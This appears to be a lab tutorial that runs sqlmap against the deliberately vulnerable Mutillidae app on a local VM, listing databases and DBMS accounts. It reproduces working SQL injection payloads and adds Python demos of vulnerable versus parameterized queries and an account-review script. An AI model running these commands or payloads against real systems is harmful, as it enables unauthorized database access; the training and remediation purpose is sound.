SQLmap Automated Injection - 02

1: To get information about the back-end SQL databases, add the `--dbs` option, which enumerates the database names:

```bash
sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username --dbs
```

```text
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:07:47 /2025-01-21/

[06:07:47] [INFO] resuming back-end DBMS 'mysql'
[06:07:47] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=vpgtsrbl91e...40rho4rej4;showhints=1'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details
---
[06:07:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP, PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[06:07:48] [INFO] fetching database names
[06:07:50] [WARNING] reflective value(s) found and filtering out
available databases [34]:
[*] .svn
[*] bricks
[*] bwapp
[*] citizens
[*] cryptomg
[*] dvwa
[*] gallery2
[*] getboo
[*] ghost
[*] gtd-php
[*] hex
[*] information_schema
[*] isp
[*] joomla
[*] mutillidae
[*] mysql
[*] nowasp
[*] orangehrm
[*] personalblog
[*] peruggia
[*] phpbb
[*] phpmyadmin
[*] proxy
[*] rentnet
[*] sqlol
[*] tikiwiki
[*] vicnum
[*] wackopicko
[*] wavsepdb
[*] webcal
[*] webgoat_coins
[*] wordpress
[*] wraithlogin
[*] yazd

[06:07:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'
[06:07:52] [WARNING] your sqlmap version is outdated

[*] ending @ 06:07:52 /2025-01-21/
```
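The first injection point sqlmap reports above is boolean-based blind: the page answers differently depending on whether an attacker-chosen condition is true, because the `username` value is spliced into the SQL text. The following is an added example (not code from the page, from sqlmap or from Mutillidae) that reproduces that behaviour against an in-memory SQLite table and shows the fix beside it. The table, column names and rows are constructed; the page's payload `-4134' OR 5736=5736` is terminated with SQLite's `-- ` line comment instead of MySQL's `#`, which SQLite does not accept.

```python
import sqlite3

# Constructed stand-in for the web application's account table (not Mutillidae's schema).
ROWS = [
    ("xiaosheng", "abc", "I <3 SQL"),
    ("admin", "adminpass", "Monkey!"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, username, password):
    """Query built by string concatenation: the input becomes part of the SQL grammar,
    so an injected OR condition decides the result and the comment discards the rest."""
    sql = ("SELECT username, signature FROM accounts "
           f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, username, password):
    """Same query with bound parameters: the input is only ever compared as data.
    In PHP the equivalent is a PDO or mysqli prepared statement."""
    sql = "SELECT username, signature FROM accounts WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


# The page's boolean-based payload (true condition) and its false counterpart,
# with SQLite's '-- ' comment in place of MySQL's '#'.
TRUE_PAYLOAD = "-4134' OR 5736=5736-- "
FALSE_PAYLOAD = "-4134' OR 5736=5737-- "

if __name__ == "__main__":
    conn = make_db()
    for label, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        print(label, "true condition  ->", fn(conn, TRUE_PAYLOAD, "wrong"))
        print(label, "false condition ->", fn(conn, FALSE_PAYLOAD, "wrong"))
```

With the concatenated query, the true condition returns every account (the password check is commented away) and the false condition returns nothing; that visible difference is the signal behind the "boolean-based blind" entry in the sqlmap summary. With bound parameters both payloads are just non-matching usernames and return no rows, while a genuine login still works.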

2: To enumerate the DBMS user accounts, use the `--users` option (sqlmap logs this step as "fetching database users"). The execution result is:

```text
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:11:28 /2025-01-21/

[06:11:29] [INFO] resuming back-end DBMS 'mysql'
[06:11:29] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jfganof3ik5...ukdpgiq063;showhints=1'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details
---
[06:11:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: Apache 2.2.14, PHP 5.3.2, PHP
back-end DBMS: MySQL >= 5.0
[06:11:30] [INFO] fetching database users
[06:11:32] [WARNING] reflective value(s) found and filtering out
database management system users [38]:
[*] 'bricks'@'%'
[*] 'bwapp'@'%'
[*] 'citizens'@'localhost'
[*] 'cryptomg'@'%'
[*] 'debian-sys-maint'@'localhost'
[*] 'dvwa'@'%'
[*] 'gallery2'@'localhost'
[*] 'getboo'@'%'
[*] 'ghost'@'%'
[*] 'gtd-php'@'%'
[*] 'hex'@'localhost'
[*] 'joomla'@'localhost'
[*] 'jotto'@'%'
[*] 'kbloom'@'localhost'
[*] 'mutillidae'@'%'
[*] 'orangehrm'@'%'
[*] 'personalblog'@'%'
[*] 'peruggia'@'%'
[*] 'phpbb'@'%'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'brokenwebapps'
[*] 'root'@'localhost'
[*] 'sendmail'@'localhost'
[*] 'sqlol'@'%'
[*] 'stealth'@'localhost'
[*] 'tikiwiki'@'localhost'
[*] 'undertaker'@'localhost'
[*] 'vicnum'@'localhost'
[*] 'wackopicko'@'%'
[*] 'wavsep'@'localhost'
[*] 'webcal'@'localhost'
[*] 'webgoat.net'@'%'
[*] 'webmaster'@'localhost'
[*] 'wordpress'@'%'
[*] 'wraith'@'localhost'
[*] 'yazd'@'%'
[*] 'yazd10'@'%'

[06:11:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'
[06:11:34] [WARNING] your sqlmap version is outdated

[*] ending @ 06:11:34 /2025-01-21/
```

The output above lists every DBMS user. To see only the current user, i.e. the account the web application itself connects with, use `--current-user`; the result is:

```text
[06:19:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP, PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[06:19:04] [INFO] fetching current user
[06:19:06] [WARNING] reflective value(s) found and filtering out
current user: 'mutillidae@%'
[06:19:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'
[06:19:06] [WARNING] your sqlmap version is outdated

[*] ending @ 06:19:06 /2025-01-21/
```
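The two listings above are the security-relevant part of this run: one injectable parameter let sqlmap read the server's whole account table, the application's own account `'mutillidae'@'%'` may connect from any host, many other accounts carry the same `%` wildcard, and root is reachable from a named host as well as locally. The script below is an added example, not code from sqlmap or from the page: it parses the `[*] 'user'@'host'` lines of a `--users` run and the `current user:` line of a `--current-user` run, then reports host-scope findings for a least-privilege review. The sample text is a constructed subset of the listing shown above; the finding names are my own.

```python
import re

# Constructed sample: seven of the 38 accounts from the --users listing on this
# page, plus the --current-user result, in sqlmap's own line format.
SAMPLE_USERS = """\
database management system users [38]:
[*] 'bricks'@'%'
[*] 'debian-sys-maint'@'localhost'
[*] 'mutillidae'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'brokenwebapps'
[*] 'root'@'localhost'
[*] 'wordpress'@'%'
"""
SAMPLE_CURRENT = "current user: 'mutillidae@%'"

USER_LINE = re.compile(r"^\[\*\]\s*'([^']*)'@'([^']*)'$")
CURRENT_LINE = re.compile(r"current user:\s*'([^']*)'")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_dbms_users(text):
    """Return (user, host) pairs from the [*] 'user'@'host' lines of a --users run."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.match(line.strip())
        if m:
            users.append((m.group(1), m.group(2)))
    return users


def parse_current_user(text):
    """Return (user, host) from the 'current user:' line, or None if absent.
    MySQL reports it as user@host, so split on the last '@'."""
    m = CURRENT_LINE.search(text)
    if not m:
        return None
    name, sep, host = m.group(1).rpartition("@")
    return (name, host) if sep else (m.group(1), "")


def host_scope(host):
    """Classify a MySQL account host part by how widely it allows connections."""
    if host == "%":
        return "any-host"
    if host in LOCAL_HOSTS:
        return "local-only"
    if "%" in host or "_" in host:  # MySQL host parts are LIKE patterns
        return "wildcard"
    return "named-host"


def review_accounts(users, current):
    """Summarise least-privilege findings from the parsed listings."""
    return {
        # accounts that may connect from anywhere
        "any_host": sorted(u for u, h in users if host_scope(h) == "any-host"),
        # hosts from which the superuser account is reachable remotely
        "remote_root": sorted(h for u, h in users if u == "root" and host_scope(h) != "local-only"),
        # the account the web application itself runs as
        "app_user": current,
        "app_user_any_host": current is not None and host_scope(current[1]) == "any-host",
        "app_user_is_root": current is not None and current[0] == "root",
    }


if __name__ == "__main__":
    report = review_accounts(parse_dbms_users(SAMPLE_USERS), parse_current_user(SAMPLE_CURRENT))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against the page's data, the report flags `bricks`, `mutillidae` and `wordpress` as connectable from any host, `brokenwebapps` as a remote root host, and the application account as one of the `%` accounts. The remediation the findings point at is the usual one: a per-application account restricted to the web server's host and to the one database it needs, so that a single injectable parameter cannot enumerate 34 databases and the server's user table.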

Reference: 16.SQL注入攻击_哔哩哔哩_bilibili (Bilibili video)
